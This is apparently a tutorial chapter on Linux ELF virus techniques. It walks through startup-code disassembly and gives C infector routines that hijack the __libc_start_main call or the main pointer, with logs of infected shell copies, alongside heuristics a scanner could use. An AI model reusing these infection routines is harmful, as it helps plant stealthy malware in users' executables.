The longest part of the journey is said to be the passing of the gate.
Marcus Terentius Varro
If we decide to leave entry_point as it is, we have to patch something else. One approach is to disassemble the code, starting at entry_point, find the first call (or jmp) and abuse it. This requires way too much intelligence for a virus, though. But then we are operating in a homogeneous environment, having one compiler and one C run-time library for all. The startup code should be the same for every executable.
We use the e_entry tool to retrieve the entry point. In some shells a read at the end of a pipeline runs in a sub-shell, so the variables it sets are not visible in the surrounding scope. The while loop is executed just once. Its only purpose is to build a block in which the variables set by read can be used.
Command: pre/i386-redhat7.3-linux/entry_point/gdb_core.sh
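#!/bin/sh
# Print the disassembly of the startup code of ${file} (default: /bin/sh).
file=${1:-/bin/sh}
tmp/i386-redhat7.3-linux/evil_magic/e_entry "${file}" \
| while read entry_point offset
do
  /bin/echo "[entry_point=${entry_point}]"
  # Stop at the entry point, then disassemble the function we stopped in.
  /usr/bin/gdb "${file}" -q <<EOT 2>&1
break *0x${entry_point}
run
set disassembly-flavor intel
disassemble
EOT
done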
Output: out/i386-redhat7.3-linux/entry_point/sh.gdb
0x8059440 <_start>: xor ebp,ebp
0x8059442 <_start+2>: pop esi
0x8059443 <_start+3>: mov ecx,esp
0x8059445 <_start+5>: and esp,0xfffffff0
0x8059448 <_start+8>: push eax
0x8059449 <_start+9>: push esp
0x805944a <_start+10>: push edx
0x805944b <_start+11>: push 0x80b1ac0
0x8059450 <_start+16>: push 0x8058ad8
0x8059455 <_start+21>: push ecx
0x8059456 <_start+22>: push esi
0x8059457 <_start+23>: push 0x8059540
0x805945c <_start+28>: call 0x8059080 <__libc_start_main>
Of course we have to check whether the code at the entry address really looks like the output above, just in case the target is already infected (by a superior virus). To implement the comparison we only need offsets and sizes, not actual opcodes. But I will feel better with the opcodes right in front of me. And ndisasm(1) starts counting with zero, which demands less brain activity.
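A comparison by offset and size could be sketched as follows. This is only an illustration, not code from the project: the names span, startup_spans and spans_match are made up, and the spans are my reading of the gdb listing above (everything except the 32-bit operands of push and call).

```c
#include <stddef.h>
#include <string.h>

/* One run of bytes that must be identical in both code sequences. */
struct span {
    size_t offset; /* distance from the entry point */
    size_t size;   /* number of bytes to compare */
};

/* Assumption of this sketch: spans derived from the gdb listing,
 * skipping every 32-bit operand (three push dword, one call). */
const struct span startup_spans[] = {
    {  0, 12 }, /* xor ... push edx, plus opcode of the first push dword */
    { 16,  1 }, /* opcode of the second push dword */
    { 21,  3 }, /* push ecx, push esi, opcode of the third push dword */
    { 28,  1 }, /* opcode of call */
};

/* Return 1 if every span matches, 0 otherwise.
 * Both buffers must hold at least 29 bytes. */
int spans_match(const unsigned char *a, const unsigned char *b,
                const struct span *spans, size_t count)
{
    size_t i;

    for (i = 0; i < count; i++) {
        if (memcmp(a + spans[i].offset, b + spans[i].offset,
                   spans[i].size) != 0)
            return 0;
    }
    return 1;
}
```

Two startup sequences that differ only in the pushed addresses or in the operand of call compare equal under this check; a difference in any opcode does not.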
Command: pre/i386-redhat7.3-linux/entry_point/intel.sh
#!/bin/sh
# Disassemble ${file} from its entry point up to the first ret or hlt.
file=${1:-/bin/sh}
tmp/i386-redhat7.3-linux/evil_magic/e_entry "${file}" \
| while read entry_point offset
do
  /usr/bin/ndisasm -e "${offset}" -o "${entry_point}" -U "${file}" \
  | /bin/sed -e "/\(ret\|hlt\)/q"
done
Output: out/i386-redhat7.3-linux/entry_point/sh.disasm
007AFA30 31ED xor ebp,ebp
007AFA32 5E pop esi
007AFA33 89E1 mov ecx,esp
007AFA35 83E4F0 and esp,byte -0x10
007AFA38 50 push eax
007AFA39 54 push esp
007AFA3A 52 push edx
007AFA3B 68C01A0B08 push dword 0x80b1ac0
007AFA40 68D88A0508 push dword 0x8058ad8
007AFA45 51 push ecx
007AFA46 56 push esi
007AFA47 6840950508 push dword 0x8059540
007AFA4C E81FFCFFFF call 0x7af670
007AFA51 F4 hlt
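The addresses in the left column differ from those printed by gdb(1). The script passes the entry point to -o without a 0x prefix, so ndisasm(1) reads 8059440 as a decimal number, which is 0x7AFA30. Offsets relative to the entry point and the instruction bytes are unaffected; only absolute addresses, including the displayed operand of call, are shifted by the same amount.
There is one remaining issue. Elf32_Ehdr::e_entry is an absolute address, as is the value popped off the stack by ret. The operand of call and jmp, however, is encoded relative to the address of the following instruction. The following is taken from the documentation of nasm. [1]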
CALL imm ; E8 rw/rd [8086]
[…] The codes rb, rw and rd indicate that one of the operands to the instruction is an immediate value, and that the difference between this value and the address of the end of the instruction is to be encoded as a byte, word or doubleword respectively. Where the form rw/rd appears, it indicates that either rw or rd should be used according to whether assembly is being performed in BITS 16 or BITS 32 state respectively.
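The arithmetic behind a 32-bit call can be sketched in a few lines of C. The function names call_target and call_displacement are my own; the only facts used are the E8 rd encoding quoted above and the little-endian byte order of i386.

```c
#include <stdint.h>

/* Absolute target of a 5-byte "call rel32" (opcode E8) whose first
 * byte is located at address call_addr. */
uint32_t call_target(uint32_t call_addr, const unsigned char *insn)
{
    /* Little-endian 32-bit displacement following the opcode. */
    uint32_t rel = (uint32_t)insn[1]
                 | ((uint32_t)insn[2] << 8)
                 | ((uint32_t)insn[3] << 16)
                 | ((uint32_t)insn[4] << 24);

    /* The displacement counts from the end of the instruction.
     * Unsigned arithmetic wraps modulo 2^32, so negative
     * displacements need no special handling. */
    return call_addr + 5 + rel;
}

/* Displacement to encode so that a call at call_addr reaches target. */
uint32_t call_displacement(uint32_t call_addr, uint32_t target)
{
    return target - (call_addr + 5);
}
```

For the bytes E8 1F FC FF FF at 0x805945c (that is _start+28) call_target yields 0x8059080, the address gdb(1) printed for __libc_start_main.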
Source: src/one_step_closer/e2/patch_entry_addr.inc
bool target_patch_entry_addr(Target* t)
{
  unsigned char* self_entry_code = (unsigned char*)SELF->e_entry;
  unsigned char* target_entry_code = t->target_entry_code;
  int beyond_the_call;
  int* patch_point;

  TRACE(stderr, "target_patch_entry_addr\n");

  /* everything up to the opcode of the first "push dword" must match */
  CHECK_EQ(memcmp(self_entry_code, target_entry_code, 0xc), 0);
  /* check for "call" */
  CHECK_EQ(self_entry_code[0x1c], target_entry_code[0x1c]);
  /* check for "hlt" */
  CHECK_EQ(self_entry_code[0x21], target_entry_code[0x21]);

  /* the operand of "call" is relative to the following instruction */
  beyond_the_call = t->p.ehdr->e_entry + 0x21;
  patch_point = (int*)(target_entry_code + 0x1D);
  t->original_entry = beyond_the_call + *patch_point;
  *patch_point = target_new_entry_addr(t) - beyond_the_call;
  TRACE(stderr, "*patch_point=%08x\n", *patch_point);
  return true;
}
Output: out/i386-redhat7.3-linux/one_step_closer/e2i1/cc
Infecting copy of /bin/tcsh... wrote 26 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 26 bytes, Ok
Infecting copy of /bin/mt... wrote 26 bytes, Ok
Infecting copy of /bin/sh... wrote 26 bytes, Ok
4 infected, 0 failed
Output: out/i386-redhat7.3-linux/one_step_closer/test-e2i1
ELFtmp/i386-redhat7.3-linux/one_step_closer/e2i1/sh_infected
2.05a.0(1)-release
ELFusage: mt [-v] [--version] [-h] [ -f device ] command [ count ]
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux
---
ELFGNU bash, version 2.05a.0(1)-release (i686-pc-linux-gnu)
Copyright 2001 Free Software Foundation, Inc.
The output looks nice, but we had that already. What have the increased code size and complexity gained us?
Source: pre/i386-redhat7.3-linux/entry_point/entry_point.sh
#!/bin/sh
tmp/i386-redhat7.3-linux/evil_magic/e_entry \
/bin/sh \
tmp/i386-redhat7.3-linux/one_step_closer/e1i1/sh_infected \
tmp/i386-redhat7.3-linux/one_step_closer/e2i1/sh_infected
Output: out/i386-redhat7.3-linux/entry_point/entry_point
8059440 70720
80c6420 517152
8059440 70720
OK. One vulnerability of the infection is not visible to readelf(1) anymore. But does that really help? It's still possible to write a heuristic scanner for it. All it takes is to verify the operand of call shown in the disassembly listing.
Output: out/i386-redhat7.3-linux/entry_point/e2.disasm
007AFA30 31ED xor ebp,ebp
007AFA32 5E pop esi
007AFA33 89E1 mov ecx,esp
007AFA35 83E4F0 and esp,byte -0x10
007AFA38 50 push eax
007AFA39 54 push esp
007AFA3A 52 push edx
007AFA3B 68C01A0B08 push dword 0x80b1ac0
007AFA40 68D88A0508 push dword 0x8058ad8
007AFA45 51 push ecx
007AFA46 56 push esi
007AFA47 6840950508 push dword 0x8059540
007AFA4C E8BFCF0600 call 0x81ca10
007AFA51 F4 hlt
The original operand is 0x7af670, which resolves into a shared library. The new value, 0x81ca10, is local to the executable and easy to spot. So what's the point?
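Such a heuristic could be sketched like this. Everything here is hypothetical: the struct, the function name, and above all the idea that a scanner knows the address range of the .plt section (it would have to read that from the section headers, which are not shown in this chapter). The offset 0x1c of the call is taken from the listing.

```c
#include <stdint.h>

/* Offset of the "call" opcode within the startup code, per the listing. */
enum { CALL_OFFSET = 0x1c };

/* Hypothetical description of a target as seen by a scanner. */
struct startup_info {
    uint32_t entry;     /* Elf32_Ehdr::e_entry */
    uint32_t plt_start; /* assumed: first address of the .plt section */
    uint32_t plt_end;   /* assumed: one past the last address of .plt */
};

/* Return 1 if the call in the startup code does not lead into the
 * PLT, 0 if it does. code must hold at least 0x21 bytes. */
int startup_call_is_suspicious(const struct startup_info *info,
                               const unsigned char *code)
{
    const unsigned char *p = code + CALL_OFFSET;
    uint32_t rel, target;

    if (p[0] != 0xE8)
        return 1; /* no call where the startup code should have one */

    /* little-endian displacement, relative to the end of the call */
    rel = (uint32_t)p[1] | ((uint32_t)p[2] << 8)
        | ((uint32_t)p[3] << 16) | ((uint32_t)p[4] << 24);
    target = info->entry + CALL_OFFSET + 5 + rel;

    return !(target >= info->plt_start && target < info->plt_end);
}
```

A call to a library function such as __libc_start_main goes through the PLT; a target anywhere else in the executable is worth a second look.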
gdb(1) revealed the name of the function whose call we abused: __libc_start_main. I can't help thinking that it is part of glibc, but let's not be hasty.
Command: pre/i386-redhat7.3-linux/entry_point/ldd.sh
#!/bin/sh
ldd /bin/bash
Output: out/i386-redhat7.3-linux/entry_point/ldd
libtermcap.so.2 => /lib/libtermcap.so.2 (0x40023000)
libdl.so.2 => /lib/libdl.so.2 (0x40028000)
libc.so.6 => /lib/libc.so.6 (0x4002b000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
Now that we have a filename we can search for the function in the library.
Command: pre/i386-redhat7.3-linux/entry_point/nm.sh
#!/bin/sh
library=$(
  /usr/bin/ldd /bin/sh \
  | /usr/bin/perl -ane 'm/libc/ && print $F[2];'
)
/usr/bin/nm -D ${library} --line-numbers --no-sort \
| /bin/grep __libc_start_main
Output: out/i386-redhat7.3-linux/entry_point/nm
00017034 T __libc_start_main
First class service. We even got a line number from nm(1).
Source: src/entry_point/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c
46 int
47 /* GKM FIXME: GCC: this should get __BP_ prefix by virtue of the
48 BPs in the arglist of startup_info.main and startup_info.init. */
49 BP_SYM (__libc_start_main) (int (*main) (int, char **, char **),
50 int argc, char *__unbounded *__unbounded ubp_av,
51 void (*init) (void), void (*fini) (void),
52 void (*rtld_fini) (void), void *__unbounded stack_end)
53 {
If you have a procedure with 10 parameters, you probably missed some (according to an old saying).
Let's see what this declaration tells us about the disassembled code. For one thing, arguments are pushed on the stack in reverse order. This is the traditional C calling convention. It allows easy implementation of functions like printf(3) that take an arbitrary number of arguments. Matching the pushes against the parameter list gives the actual values of the constant arguments: main = 0x8059540, init = 0x8058ad8, fini = 0x80b1ac0.
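To convince myself of the mapping between pushes and parameters, here is a toy model of the stack. It is a sketch only: toy_stack, replay_start and start_main_args are invented names, pointers are reduced to 32-bit integers, and the register contents are passed in by the caller because the listing does not show them. I assume that the leading push eax is mere padding and not an argument.

```c
#include <stdint.h>
#include <string.h>

/* The seven arguments of __libc_start_main as they lie in memory at
 * the moment of the call, lowest address first. */
struct start_main_args {
    uint32_t main, argc, ubp_av, init, fini, rtld_fini, stack_end;
};

/* A toy stack of 32-bit slots that grows downward, like the real one. */
struct toy_stack {
    uint32_t slot[16];
    int top; /* index of the most recently pushed slot */
};

void toy_push(struct toy_stack *s, uint32_t value)
{
    s->slot[--s->top] = value;
}

/* Replay the pushes of _start in the order of the listing. */
struct start_main_args replay_start(uint32_t eax, uint32_t esp,
                                    uint32_t edx, uint32_t ecx,
                                    uint32_t esi)
{
    struct toy_stack s;
    struct start_main_args args;

    s.top = 16;
    toy_push(&s, eax);       /* assumed to be padding */
    toy_push(&s, esp);       /* stack_end */
    toy_push(&s, edx);       /* rtld_fini */
    toy_push(&s, 0x80b1ac0); /* fini */
    toy_push(&s, 0x8058ad8); /* init */
    toy_push(&s, ecx);       /* ubp_av */
    toy_push(&s, esi);       /* argc */
    toy_push(&s, 0x8059540); /* main */

    /* The last value pushed sits at the lowest address and is
     * therefore the first parameter. */
    memcpy(&args, &s.slot[s.top], sizeof args);
    return args;
}
```

The value pushed last ends up as the first member of the struct, which is why the final push dword before the call carries the address of main.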
The case of rtld_fini needs more documentation. [2] A comment from glibc's /usr/include/asm/elf.h:
/* SVR4/i386 ABI (pages 3-31, 3-32) says that when the program starts %edx contains a pointer to a function which might be registered using atexit. This provides a mean for the dynamic linker to call DT_FINI functions for shared libraries that have been loaded before the code runs. A value of 0 tells we have no such handler.
Anyway, even without looking at the complete source of __libc_start_main I would guess that each of these function pointers is invoked at some time. We concentrate our efforts on main.
Source: src/one_step_closer/e3/patch_entry_addr.inc
bool target_patch_entry_addr(Target* t)
{
  unsigned char* self_entry_code = (unsigned char*)SELF->e_entry;
  unsigned char* target_entry_code = t->target_entry_code;
  /* operand of the last "push dword", i.e. the address of main */
  int* patch_point = (int*)(target_entry_code + 0x18);

  TRACE(stderr, "target_patch_entry_addr\n");

  /* everything up to the opcode of the first "push dword" must match */
  CHECK_EQ(memcmp(self_entry_code, target_entry_code, 0xc), 0);
  /* check for last "push" */
  CHECK_EQ(self_entry_code[0x17], target_entry_code[0x17]);
  /* check for "call" */
  CHECK_EQ(self_entry_code[0x1c], target_entry_code[0x1c]);
  /* check for "hlt" */
  CHECK_EQ(self_entry_code[0x21], target_entry_code[0x21]);

  /* main is pushed as an absolute address, so no arithmetic is needed */
  t->original_entry = *patch_point;
  TRACE(stderr, "old *patch_point=%08x\n", *patch_point);
  *patch_point = target_new_entry_addr(t);
  TRACE(stderr, "new *patch_point=%08x\n", *patch_point);
  return true;
}
Output: out/i386-redhat7.3-linux/one_step_closer/test-e3i1
ELFtmp/i386-redhat7.3-linux/one_step_closer/e3i1/sh_infected
2.05a.0(1)-release
ELFusage: mt [-v] [--version] [-h] [ -f device ] command [ count ]
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux
---
ELFGNU bash, version 2.05a.0(1)-release (i686-pc-linux-gnu)
Copyright 2001 Free Software Foundation, Inc.
We see the same nice output again and again. So what's different this time?
Output: out/i386-redhat7.3-linux/entry_point/e3.disasm
007AFA30 31ED xor ebp,ebp
007AFA32 5E pop esi
007AFA33 89E1 mov ecx,esp
007AFA35 83E4F0 and esp,byte -0x10
007AFA38 50 push eax
007AFA39 54 push esp
007AFA3A 52 push edx
007AFA3B 68C01A0B08 push dword 0x80b1ac0
007AFA40 68D88A0508 push dword 0x8058ad8
007AFA45 51 push ecx
007AFA46 56 push esi
007AFA47 6820640C08 push dword 0x80c6420
007AFA4C E81FFCFFFF call 0x7af670
007AFA51 F4 hlt
The difference from the original is less obvious. Both values of main are local to the executable. But again the modified value is less than 4096 bytes from the end of the code segment.
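A scanner could turn that observation into a test along these lines. This is a sketch under assumptions: the function name is made up, and the start and size of the code segment are plain parameters here; in practice they would presumably come from the p_vaddr and p_filesz fields of the program header.

```c
#include <stdint.h>

enum { PAGE_SIZE_I386 = 4096 };

/* Return 1 if addr lies inside the segment and less than one page
 * before its end, 0 otherwise. */
int near_segment_end(uint32_t addr, uint32_t seg_vaddr, uint32_t seg_size)
{
    uint32_t seg_end = seg_vaddr + seg_size;

    if (addr < seg_vaddr || addr >= seg_end)
        return 0; /* not in this segment at all */
    return seg_end - addr < PAGE_SIZE_I386;
}
```

Fed with the operand of the last push dword, the check flags a main that lives in the last page of the code segment. A legitimate main can end up there too, so this is a hint, not proof.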
It seems that we achieved little. But the concept of studying source code to find patch points looks promising.
[1] Section A.2 at http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.2 and A.13 at http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.13.
[2]